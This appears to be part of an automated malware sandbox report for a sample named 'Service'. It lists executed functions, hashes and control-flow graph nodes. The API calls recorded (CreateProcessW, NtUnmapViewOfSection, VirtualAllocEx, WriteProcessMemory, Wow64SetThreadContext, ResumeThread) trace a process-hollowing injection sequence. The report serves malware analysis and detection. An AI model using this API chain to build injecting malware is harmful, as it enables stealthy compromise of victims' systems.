                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7a90b8c79f7aa45b0ff9554171caba199f33aaa967796e82d97c21b08fcaeda5
                                • Instruction ID: 9e4b3804dd4ed4789a3b5ec480c1275816d2f45e9048f44df2d93864a7a44a6a
                                • Opcode Fuzzy Hash: 7a90b8c79f7aa45b0ff9554171caba199f33aaa967796e82d97c21b08fcaeda5
                                • Instruction Fuzzy Hash: D411CB3690035A8FDB42FF28FA80A563BB5FB84706B109A68D4048B32DD7706D49CF82

                                Execution Graph

                                Execution Coverage:31.9%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:6.1%
                                Total number of Nodes:49
                                Total number of Limit Nodes:4
                                execution_graph 3905 8271d0 3907 8271ea 3905->3907 3906 827239 3907->3906 3910 827288 3907->3910 3916 827279 3907->3916 3911 8272bb 3910->3911 3922 82614c 3911->3922 3913 8274af 3914 82617c NtUnmapViewOfSection 3913->3914 3915 8276ef 3913->3915 3914->3915 3915->3907 3917 8272bb 3916->3917 3918 82614c CreateProcessW 3917->3918 3919 8274af 3918->3919 3921 8276ef 3919->3921 3926 82617c 3919->3926 3921->3907 3923 827ce8 CreateProcessW 3922->3923 3925 827ece 3923->3925 3927 828008 NtUnmapViewOfSection 3926->3927 3928 82809e 3927->3928 3928->3921 3929 8220f0 VirtualAllocEx 3930 8221a7 3929->3930 3897 821ec8 3898 821f26 3897->3898 3899 821f3b Wow64SetThreadContext 3897->3899 3898->3899 3900 821f84 3899->3900 3901 821ba8 3902 821c35 CreateProcessW 3901->3902 3904 821d8e 3902->3904 3931 821fd8 ReadProcessMemory 3932 822097 3931->3932 3933 825f98 3934 825fb2 3933->3934 3935 826001 3934->3935 3938 826450 3934->3938 3942 8261c8 3934->3942 3940 826483 3938->3940 3946 824024 3940->3946 3941 826677 3941->3934 3943 8261cd 3942->3943 3944 824024 CreateProcessW 3943->3944 3945 826677 3944->3945 3945->3934 3947 826eb0 CreateProcessW 3946->3947 3949 827096 3947->3949 3950 822338 ResumeThread 3951 8223c0 3950->3951 3952 8221f8 3953 822261 3952->3953 3954 822276 WriteProcessMemory 3952->3954 3953->3954 3955 8222d8 3954->3955

                                Executed Functions

                                Function 0082617C Relevance: 1.6, APIs: 1, Instructions: 77nativeCOMMON
                                Download Yara Rule
                                APIs
                                • NtUnmapViewOfSection.NTDLL(?,?), ref: 0082808C
                                Memory Dump Source
                                • Source File: 00000019.00000002.1881355985.0000000000820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_820000_Service.jbxd
                                Similarity
                                • API ID: SectionUnmapView
                                • String ID:
                                • API String ID: 498011366-0
                                • Opcode ID: 4bcb0b3501a8a7e60d6e41a098f0ca6013afa61c87de81ec8cafa95619ae4747
                                • Instruction ID: d4153056bcb0efa783e9a4932f18294e1ff7ac892ef93d2180a59cc17856f343
                                • Opcode Fuzzy Hash: 4bcb0b3501a8a7e60d6e41a098f0ca6013afa61c87de81ec8cafa95619ae4747
                                • Instruction Fuzzy Hash: 373199B4D05218DFCF20CF99E984A9EBBF4FB09310F24901AE814B7310D775A9458FA4
                                Function 00828000 Relevance: 1.6, APIs: 1, Instructions: 76nativeCOMMON
                                Download Yara Rule
                                APIs
                                • NtUnmapViewOfSection.NTDLL(?,?), ref: 0082808C
                                Memory Dump Source
                                • Source File: 00000019.00000002.1881355985.0000000000820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_820000_Service.jbxd
                                Similarity
                                • API ID: SectionUnmapView
                                • String ID:
                                • API String ID: 498011366-0
                                • Opcode ID: 6a8c3469ea03f9f729f063f982035fe48c23ef135daa250a6e80272b488fccf5
                                • Instruction ID: dfa977223d5c234f052791c93f5bef1594c90208fd917efa8232921a6584ef5b
                                • Opcode Fuzzy Hash: 6a8c3469ea03f9f729f063f982035fe48c23ef135daa250a6e80272b488fccf5
                                • Instruction Fuzzy Hash: 193178B9D012189FCF20CFA9E984A9EFBF5FB49310F24901AE814B7310D775A9498F64
                                Function 00825C6C Relevance: 1.7, APIs: 1, Instructions: 226processCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 645 825c6c-825d03 646 825d05-825d17 645->646 647 825d1a-825d28 645->647 646->647 648 825d2a-825d3c 647->648 649 825d3f-825d7b 647->649 648->649 650 825d8f-825e5c CreateProcessW 649->650 651 825d7d-825d8c 649->651 655 825e65-825f24 650->655 656 825e5e-825e64 650->656 651->650 666 825f26-825f4f 655->666 667 825f5a-825f65 655->667 656->655 666->667 671 825f66 667->671 671->671
                                APIs
                                • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00825E49
                                Memory Dump Source
                                • Source File: 00000019.00000002.1881355985.0000000000820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_820000_Service.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: d291df9e9b5d80b8f30bd981b3e65caa276041a4fad796c48c002e9a0234a71a
                                • Instruction ID: 6d388bfe471c3e0f9a9a55553f288eb962c33689b03b42330c78f2c93976b590
                                • Opcode Fuzzy Hash: d291df9e9b5d80b8f30bd981b3e65caa276041a4fad796c48c002e9a0234a71a
                                • Instruction Fuzzy Hash: C181D274D0022ADFDB20DFA5D844BDDBBB5BB49300F1091AAE508B7260DB309A89CF54
                                Function 00821B9C Relevance: 1.7, APIs: 1, Instructions: 225processCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 672 821b9c-821c33 674 821c35-821c47 672->674 675 821c4a-821c58 672->675 674->675 676 821c5a-821c6c 675->676 677 821c6f-821cab 675->677 676->677 678 821cbf-821d8c CreateProcessW 677->678 679 821cad-821cbc 677->679 683 821d95-821e54 678->683 684 821d8e-821d94 678->684 679->678 694 821e56-821e7f 683->694 695 821e8a-821e95 683->695 684->683 694->695 699 821e96 695->699 699->699
                                APIs
                                • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00821D79
                                Memory Dump Source
                                • Source File: 00000019.00000002.1881355985.0000000000820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_820000_Service.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: 063e894a095ed92b47739277b132387c4d90228127e21e8155534e80f59d7838
                                • Instruction ID: ab0d3a3ad4795a22a7de29e85e6402755ce1797f8129939cfd9ab8568002329c
                                • Opcode Fuzzy Hash: 063e894a095ed92b47739277b132387c4d90228127e21e8155534e80f59d7838
                                • Instruction Fuzzy Hash: B981C075D0026ADFDF24CFA5D884BDDBBB1BB59300F1091AAE508B7260DB709A89CF54
                                Function 00826EA4 Relevance: 1.7, APIs: 1, Instructions: 225processCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 700 826ea4-826f3b 701 826f52-826f60 700->701 702 826f3d-826f4f 700->702 703 826f62-826f74 701->703 704 826f77-826fb3 701->704 702->701 703->704 705 826fc7-827094 CreateProcessW 704->705 706 826fb5-826fc4 704->706 710 827096-82709c 705->710 711 82709d-82715c 705->711 706->705 710->711 721 827192-82719d 711->721 722 82715e-827187 711->722 725 82719e 721->725 722->721 725->725
                                APIs
                                • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000), ref: 00827081
                                Memory Dump Source
                                • Source File: 00000019.00000002.1881355985.0000000000820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_820000_Service.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: 3d3960b58cb8ac10760cab2c55f1cbd884f3f8b103656c88a7f2bbf9ce33ff33
                                • Instruction ID: 691495284093193e6c67c369e82c7d0bc67462e0d033f6c0c76d88de30ef3305
                                • Opcode Fuzzy Hash: 3d3960b58cb8ac10760cab2c55f1cbd884f3f8b103656c88a7f2bbf9ce33ff33
                                • Instruction Fuzzy Hash: 0881BF74D0026ADFDF21CFA5D880BDDBBB5BB49300F1091AAE548B7260DB709A89CF54
                                Function 00824E34 Relevance: 1.7, APIs: 1, Instructions: 224processCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 727 824e34-824ecb 728 824ee2-824ef0 727->728 729 824ecd-824edf 727->729 730 824ef2-824f04 728->730 731 824f07-824f43 728->731 729->728 730->731 732 824f57-825024 CreateProcessW 731->732 733 824f45-824f54 731->733 737 825026-82502c 732->737 738 82502d-8250ec 732->738 733->732 737->738 748 825122-82512d 738->748 749 8250ee-825117 738->749 752 82512e 748->752 749->748 752->752
                                APIs
                                • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00825011
                                Memory Dump Source
                                • Source File: 00000019.00000002.1881355985.0000000000820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_820000_Service.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: 9f4b9d0d532066b221fd33d61f815485fa7d9d88dce540bdf6e6d9d8784c0678
                                • Instruction ID: 6c0d98cde92915a088cc6b591bf1951128c6aefaf77bb4bf261189ecb0d0c5b0
                                • Opcode Fuzzy Hash: 9f4b9d0d532066b221fd33d61f815485fa7d9d88dce540bdf6e6d9d8784c0678
                                • Instruction Fuzzy Hash: 3D81BE75D0026ACFDB21CFA5D940BDEBBF5BB49300F1491AAE508B7260DB709A89CF54
                                Function 00824024 Relevance: 1.7, APIs: 1, Instructions: 223processCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 754 824024-826f3b 756 826f52-826f60 754->756 757 826f3d-826f4f 754->757 758 826f62-826f74 756->758 759 826f77-826fb3 756->759 757->756 758->759 760 826fc7-827094 CreateProcessW 759->760 761 826fb5-826fc4 759->761 765 827096-82709c 760->765 766 82709d-82715c 760->766 761->760 765->766 776 827192-82719d 766->776 777 82715e-827187 766->777 780 82719e 776->780 777->776 780->780
                                APIs
                                • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000), ref: 00827081
                                Memory Dump Source
                                • Source File: 00000019.00000002.1881355985.0000000000820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_820000_Service.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: af3db5b5e26c1cf12d8da285ea1e6e22a87177b7667b7a496e4e7853ec59a0a5
                                • Instruction ID: 09079a95ef1614d233cf3b34b967b6163fa96aaa90c346a5b371587b79cf60cd
                                • Opcode Fuzzy Hash: af3db5b5e26c1cf12d8da285ea1e6e22a87177b7667b7a496e4e7853ec59a0a5
                                • Instruction Fuzzy Hash: 8A81B075D0026ADFDF21CFA5D840BDEBBB5BB49304F1091AAE508B7260DB709A89CF54
                                Function 0082614C Relevance: 1.7, APIs: 1, Instructions: 223processCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 782 82614c-827d73 784 827d75-827d87 782->784 785 827d8a-827d98 782->785 784->785 786 827d9a-827dac 785->786 787 827daf-827deb 785->787 786->787 788 827dff-827ecc CreateProcessW 787->788 789 827ded-827dfc 787->789 793 827ed5-827f94 788->793 794 827ece-827ed4 788->794 789->788 804 827f96-827fbf 793->804 805 827fca-827fd5 793->805 794->793 804->805 808 827fd6 805->808 808->808
                                APIs
                                • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000), ref: 00827EB9
                                Memory Dump Source
                                • Source File: 00000019.00000002.1881355985.0000000000820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_820000_Service.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: 2e3fe77dc81b3f3efd5f102866325f0065d412bcbd5642d76ef9ba9062e72842
                                • Instruction ID: 3d9f6afca1ed74ca3439491f6d38742be9ee8efd871a8286a87355f7108f0f0f
                                • Opcode Fuzzy Hash: 2e3fe77dc81b3f3efd5f102866325f0065d412bcbd5642d76ef9ba9062e72842
                                • Instruction Fuzzy Hash: 6E81CF75D0422ECFDB21DFA5D880BEDBBB5BB49304F1091AAE508B7260DB709A85CF54
                                Function 00827CDC Relevance: 1.7, APIs: 1, Instructions: 223processCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 810 827cdc-827d73 812 827d75-827d87 810->812 813 827d8a-827d98 810->813 812->813 814 827d9a-827dac 813->814 815 827daf-827deb 813->815 814->815 816 827dff-827ecc CreateProcessW 815->816 817 827ded-827dfc 815->817 821 827ed5-827f94 816->821 822 827ece-827ed4 816->822 817->816 832 827f96-827fbf 821->832 833 827fca-827fd5 821->833 822->821 832->833 836 827fd6 833->836 836->836
                                APIs
                                • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000), ref: 00827EB9
                                Memory Dump Source
                                • Source File: 00000019.00000002.1881355985.0000000000820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_820000_Service.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: 01884379636c0bdebf6d48a985b8a53f8ea74ab5f76d5d50fafd99dff3923db3
                                • Instruction ID: 065d82ce4c2d9fc72ebf5add79ec5fdf43bf25b6ad984d524e56d31a1fb72335
                                • Opcode Fuzzy Hash: 01884379636c0bdebf6d48a985b8a53f8ea74ab5f76d5d50fafd99dff3923db3
                                • Instruction Fuzzy Hash: 7E81C275D0022ECFDB21CFA5D880BDDBBB5BB49300F1091AAE508B7260DB309A89CF54
                                Function 00821BA8 Relevance: 1.7, APIs: 1, Instructions: 220processCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 838 821ba8-821c33 839 821c35-821c47 838->839 840 821c4a-821c58 838->840 839->840 841 821c5a-821c6c 840->841 842 821c6f-821cab 840->842 841->842 843 821cbf-821d8c CreateProcessW 842->843 844 821cad-821cbc 842->844 848 821d95-821e54 843->848 849 821d8e-821d94 843->849 844->843 859 821e56-821e7f 848->859 860 821e8a-821e95 848->860 849->848 859->860 864 821e96 860->864 864->864
                                APIs
                                • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00821D79
                                Memory Dump Source
                                • Source File: 00000019.00000002.1881355985.0000000000820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_820000_Service.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: 941e73c0cc1b41af1eabf18c80e4648c2ccd42abea79ca6cdbf9de0f0cef0499
                                • Instruction ID: 8cdf15c9ba7b296901e51637ef3533314eaef691a420a7fedf0d9475e1be58da
                                • Opcode Fuzzy Hash: 941e73c0cc1b41af1eabf18c80e4648c2ccd42abea79ca6cdbf9de0f0cef0499
                                • Instruction Fuzzy Hash: 7281C175D00229DFDF24CFA5D884BDDBBB5BB49300F1091AAE508B7260DB709A89CF54
                                Function 00825C78 Relevance: 1.7, APIs: 1, Instructions: 220processCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 892 825c78-825d03 893 825d05-825d17 892->893 894 825d1a-825d28 892->894 893->894 895 825d2a-825d3c 894->895 896 825d3f-825d7b 894->896 895->896 897 825d8f-825e5c CreateProcessW 896->897 898 825d7d-825d8c 896->898 902 825e65-825f24 897->902 903 825e5e-825e64 897->903 898->897 913 825f26-825f4f 902->913 914 825f5a-825f65 902->914 903->902 913->914 918 825f66 914->918 918->918
                                APIs
                                • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00825E49
                                Memory Dump Source
                                • Source File: 00000019.00000002.1881355985.0000000000820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_820000_Service.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: 45c40116e406df6c6df1c484dd96a45241ca0446e83139ff8400b2342b2c96b5
                                • Instruction ID: 9ac6611a154868e6606d1371197ed231ea83f104281de876e4dfe3a6ccb68463
                                • Opcode Fuzzy Hash: 45c40116e406df6c6df1c484dd96a45241ca0446e83139ff8400b2342b2c96b5
                                • Instruction Fuzzy Hash: 5681B175D0022ADFDB20DFA5D844BDEBBF5BB49300F1091AAE508B7260DB709A89CF54
                                Function 00824E40 Relevance: 1.7, APIs: 1, Instructions: 220processCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 865 824e40-824ecb 866 824ee2-824ef0 865->866 867 824ecd-824edf 865->867 868 824ef2-824f04 866->868 869 824f07-824f43 866->869 867->866 868->869 870 824f57-825024 CreateProcessW 869->870 871 824f45-824f54 869->871 875 825026-82502c 870->875 876 82502d-8250ec 870->876 871->870 875->876 886 825122-82512d 876->886 887 8250ee-825117 876->887 890 82512e 886->890 887->886 890->890
                                APIs
                                • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00825011
                                Memory Dump Source
                                • Source File: 00000019.00000002.1881355985.0000000000820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_820000_Service.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: b3d95b2a96aae82549dc512c77b292ecab784d06d78cbff1e41bf133e7e639ee
                                • Instruction ID: f912d009f3889d8f6cf0f91fea935c0255da64c47311c27c49a66ff6de06db3d
                                • Opcode Fuzzy Hash: b3d95b2a96aae82549dc512c77b292ecab784d06d78cbff1e41bf133e7e639ee
                                • Instruction Fuzzy Hash: 4181BF75D0026ACFDB21CFA5D940BDEBBF5BB49300F1491AAE508B7260DB709A89CF54
                                Function 008221F0 Relevance: 1.6, APIs: 1, Instructions: 113injectionCOMMON
                                Download Yara Rule
                                APIs
                                • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 008222C6
                                Memory Dump Source
                                • Source File: 00000019.00000002.1881355985.0000000000820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_820000_Service.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID:
                                • API String ID: 3559483778-0
                                • Opcode ID: 09057e7f7e6e2f46411dd9696d61f0c056ca57f37cdd1058f3fa725d4cff6d2f
                                • Instruction ID: 277b3b6ec8cc6c86a1306609843159ad02f84cce6765a5e1407288ac62c51cdd
                                • Opcode Fuzzy Hash: 09057e7f7e6e2f46411dd9696d61f0c056ca57f37cdd1058f3fa725d4cff6d2f
                                • Instruction Fuzzy Hash: 104177B5D042589FCB10CFA9E984ADEFBF1FB49314F24902AE818B7250D375AA45CF64
                                Function 008221F8 Relevance: 1.6, APIs: 1, Instructions: 110injectionCOMMON
                                Download Yara Rule
                                APIs
                                • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 008222C6
                                Memory Dump Source
                                • Source File: 00000019.00000002.1881355985.0000000000820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_820000_Service.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID:
                                • API String ID: 3559483778-0
                                • Opcode ID: 4522f01a0dceb4ae6c55cec287272b2f83e9d2bdb4639593f7872e091eb0ee00
                                • Instruction ID: 9966664c6a736a5872c62d1fe14b0a510fc651d74ee8c3e7630861a3bf8ab457
                                • Opcode Fuzzy Hash: 4522f01a0dceb4ae6c55cec287272b2f83e9d2bdb4639593f7872e091eb0ee00
                                • Instruction Fuzzy Hash: BF4166B5D04258DFCB10CFA9D984ADEFBF1FB49310F24902AE818B7210D375AA45CB64
                                Function 00821FD0 Relevance: 1.6, APIs: 1, Instructions: 102COMMON
                                Download Yara Rule
                                APIs
                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00822085
                                Memory Dump Source
                                • Source File: 00000019.00000002.1881355985.0000000000820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_820000_Service.jbxd
                                Similarity
                                • API ID: MemoryProcessRead
                                • String ID:
                                • API String ID: 1726664587-0
                                • Opcode ID: 0f8dac68c7504e813c658f34c68a37a883b89f1557401783d572fdcf18ea8517
                                • Instruction ID: aacf7a40fc7eac6b1cc4d77a8802a19b5961fd266018b2695c96d7ded977a9f5
                                • Opcode Fuzzy Hash: 0f8dac68c7504e813c658f34c68a37a883b89f1557401783d572fdcf18ea8517
                                • Instruction Fuzzy Hash: DA4178B9D04258DFCF10CFAAE984ADEFBB1BB19310F14A02AE814B7210C375A945CF64
                                Function 008220E8 Relevance: 1.6, APIs: 1, Instructions: 100memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00822195
                                Memory Dump Source
                                • Source File: 00000019.00000002.1881355985.0000000000820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_820000_Service.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 1bd1b595fe84964b3939dab2a57fe51abc31e8b04ad4ed3fb0fa85324129d852
                                • Instruction ID: 348f6ffadfc299bc86c220a41cef3f861c2d4f7efac0a081ccf137e7a3b7ba07
                                • Opcode Fuzzy Hash: 1bd1b595fe84964b3939dab2a57fe51abc31e8b04ad4ed3fb0fa85324129d852
                                • Instruction Fuzzy Hash: 983176B8D042589FCF10CFA9E884ADEFBB1BB49310F10A41AE914BB210D375A946CF64
                                Function 00821FD8 Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                Download Yara Rule
                                APIs
                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00822085
                                Memory Dump Source
                                • Source File: 00000019.00000002.1881355985.0000000000820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_820000_Service.jbxd
                                Similarity
                                • API ID: MemoryProcessRead
                                • String ID:
                                • API String ID: 1726664587-0
                                • Opcode ID: c2e1141e5563d91ee1a199b24d75a95794e24c185232a01144411404c6f0f276
                                • Instruction ID: 836d35e45bfc39834b4cd0583ed3c1019548a9ff9dfa2c9ba11a8e2833ded188
                                • Opcode Fuzzy Hash: c2e1141e5563d91ee1a199b24d75a95794e24c185232a01144411404c6f0f276
                                • Instruction Fuzzy Hash: AD3168B9D042599FCF10CFAAD984ADEFBB5BB19310F10A02AE814B7210D375A945CF69
                                Function 008220F0 Relevance: 1.6, APIs: 1, Instructions: 95memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00822195
                                Memory Dump Source
                                • Source File: 00000019.00000002.1881355985.0000000000820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_820000_Service.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: b67f879b9f0a6aeee546f0dee4361c590913aa985b779c1e6ec331b34dc18d43
                                • Instruction ID: 7e85a3b6caaffcea37ed85ca316a511fd9e9204cdc7db90e7148eb077608f023
                                • Opcode Fuzzy Hash: b67f879b9f0a6aeee546f0dee4361c590913aa985b779c1e6ec331b34dc18d43
                                • Instruction Fuzzy Hash: D03174B9D04258AFCF10CFA9E884ADEFBB5BB09310F10A02AE914B7310D375A945CF64
                                Function 00821EC1 Relevance: 1.6, APIs: 1, Instructions: 88threadCOMMON
                                Download Yara Rule
                                APIs
                                • Wow64SetThreadContext.KERNEL32(?,?), ref: 00821F72
                                Memory Dump Source
                                • Source File: 00000019.00000002.1881355985.0000000000820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_820000_Service.jbxd
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID:
                                • API String ID: 983334009-0
                                • Opcode ID: 7b07afb4fe7ff6e921c594ceffb169bd30d2713ca73e2a566141ea255de4f68a
                                • Instruction ID: 992f859b368f49f95e616fd0b6b0d625daed5539a817808403196962462d82be
                                • Opcode Fuzzy Hash: 7b07afb4fe7ff6e921c594ceffb169bd30d2713ca73e2a566141ea255de4f68a
                                • Instruction Fuzzy Hash: 8A31CAB5D012589FCF14CFAAD984ADEFBF1BB49314F24802AE418B7250C778AA45CF64
                                Function 00821EC8 Relevance: 1.6, APIs: 1, Instructions: 88threadCOMMON
                                Download Yara Rule
                                APIs
                                • Wow64SetThreadContext.KERNEL32(?,?), ref: 00821F72
                                Memory Dump Source
                                • Source File: 00000019.00000002.1881355985.0000000000820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_820000_Service.jbxd
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID:
                                • API String ID: 983334009-0
                                • Opcode ID: eeda3ff5a458ae5168ec607a059214681fc4dc41de34a8dca6e92276acdaebab
                                • Instruction ID: 00002c08374f88491219d93785a8eec108ef82ae7d6bb01548e91d6d62a9b6fd
                                • Opcode Fuzzy Hash: eeda3ff5a458ae5168ec607a059214681fc4dc41de34a8dca6e92276acdaebab
                                • Instruction Fuzzy Hash: 0631AAB5D012589FCF10CFAAD984ADEFBF1BB49310F24802AE414B7210C778AA45CF64
                                Function 00822331 Relevance: 1.6, APIs: 1, Instructions: 70threadCOMMON
                                Download Yara Rule
                                APIs
                                • ResumeThread.KERNELBASE(?), ref: 008223AE
                                Memory Dump Source
                                • Source File: 00000019.00000002.1881355985.0000000000820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_820000_Service.jbxd
                                Similarity
                                • API ID: ResumeThread
                                • String ID:
                                • API String ID: 947044025-0
                                • Opcode ID: a1ebf1bdffb48a42a9da3490c8cf763d5283540e37f53bc167278b0c445c0d30
                                • Instruction ID: 944643d5ff92fc96c67968cb1ee4cde3f610b6b8eef5609ccf0b19b0323b5cc2
                                • Opcode Fuzzy Hash: a1ebf1bdffb48a42a9da3490c8cf763d5283540e37f53bc167278b0c445c0d30
                                • Instruction Fuzzy Hash: 202189B4D002199FCB20CFA9D484ADEFBF4BB49310F24905AE814B7310C375A945CFA4
                                Function 00822338 Relevance: 1.6, APIs: 1, Instructions: 66threadCOMMON
                                Download Yara Rule
                                APIs
                                • ResumeThread.KERNELBASE(?), ref: 008223AE
                                Memory Dump Source
                                • Source File: 00000019.00000002.1881355985.0000000000820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_820000_Service.jbxd
                                Similarity
                                • API ID: ResumeThread
                                • String ID:
                                • API String ID: 947044025-0
                                • Opcode ID: 4696c8cf2dcca91a3a6dce1ed99707b76fd6ec183ad48b7bb6e7f1ebf85e6239
                                • Instruction ID: 4094da9b44144b931e44350368f37107ae351a2ee1e714836923ebc31030c5cb
                                • Opcode Fuzzy Hash: 4696c8cf2dcca91a3a6dce1ed99707b76fd6ec183ad48b7bb6e7f1ebf85e6239
                                • Instruction Fuzzy Hash: 812188B8D002199FCB10CFA9D484ADEFBF4BB49320F24901AE918B7310D375A945CFA4
                                Function 0077D5B8 Relevance: .1, Instructions: 75COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000019.00000002.1881062271.000000000077D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0077D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_77d000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 780110fb6b69c653f6136aead284a1db883993c1e62fe286f265f6fa85b51719
                                • Instruction ID: 997541ea8967f8f775332c720b85125c27cc739fb33d8474e4261a9667c13c0a
                                • Opcode Fuzzy Hash: 780110fb6b69c653f6136aead284a1db883993c1e62fe286f265f6fa85b51719
